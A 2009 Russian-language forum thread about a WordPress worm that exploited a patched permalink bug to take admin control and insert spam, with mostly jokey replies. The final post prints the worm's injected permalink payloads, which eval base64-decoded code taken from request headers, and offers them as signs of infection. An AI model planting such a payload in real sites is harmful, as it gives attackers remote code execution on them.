WordPress предупреждает об атаке червя

Discussion in 'Мировые новости. Обсуждения.' started by [email protected]$e, 7 Sep 2009.

  1. W@r.N0i$e

    Joined:
    2 Jun 2009
    Messages:
    54
    Likes Received:
    51
    Reputations:
    12
    В WordPress предупреждают о том, что среди пользователей платформы начал распространяться "умный" червь, использующий старую уязвимость в системе безопасности.

    Компания предостерегает, что распространение червя продолжается, и что обнаружить его удалось лишь из-за недоработок в коде вредоносной программы.

    Представители фирмы пишут, что данный конкретный червь, как и многие его предшественники, достаточно "умен" - он регистрирует пользователей и эксплуатирует пропатченный ранее баг в системе безопасности для выполнения кода через структуру постоянных ссылок (Permalink). Червь получает права администратора, использует JavaScript для маскировки на пользовательских страницах и пытается замести следы своей деятельности, в результате чего жертва остается в неведении относительно вредоносной активности программы, которая вставляет спам и опасные приложения в старые сообщения.

    В результате плохой реализации замысла червь коверкает ссылки на странице пользователя, предупреждая его наличием странностей.

    Текущая версия WordPress за номером 2.8.4 не подвержена заражению этим червем, поэтому разработчик настойчиво рекомендует всем клиентам обновиться как можно скорее, поскольку это единственный способ борьбы с данной заразой.

    http://www.xakep.ru/post/49381/default.asp
    07.09.2009 11:02:23​
     
    #1 [email protected]$e, 7 Sep 2009
    Last edited: 7 Sep 2009
    2 people like this.
  2. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    смешно))) :D :D :D
     
  3. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    172
    Likes Received:
    134
    Reputations:
    6
    вчерашный новост
    http://uinc.ru/news/sn12408.html
     
    1 person likes this.
  4. Premiere

    Premiere Member

    Joined:
    15 Jul 2009
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    а были и "тупые" черви?
     
    1 person likes this.
  5. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Редко, но были
     
  6. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,691
    Likes Received:
    3,145
    Reputations:
    236
    вот вам лишь бы поржать, аки лошадки.

    топик достаточно серьезный по сути.
     
    2 people like this.
  7. Grawl

    Grawl Member

    Joined:
    4 Sep 2009
    Messages:
    13
    Likes Received:
    28
    Reputations:
    0
    Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие нижеследующего кода.

    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    или

    “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

    или ошибки

    ‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

    Если есть такой код или фид сломан, то блог инфицирован.

    Процедура удаления червя представляет собой нетривиальную задачу.

    Кстати, Мэтт Мюлленвег разродился большой статьёй на тему безопасности, в которой призывает юзеров постоянно отслеживать и устанавливать свежие апдейты, вот инструкция по апгрейду WordPress. Это единственный способ обезопасить себя от этой и будущих эпидемий.
     
Loading...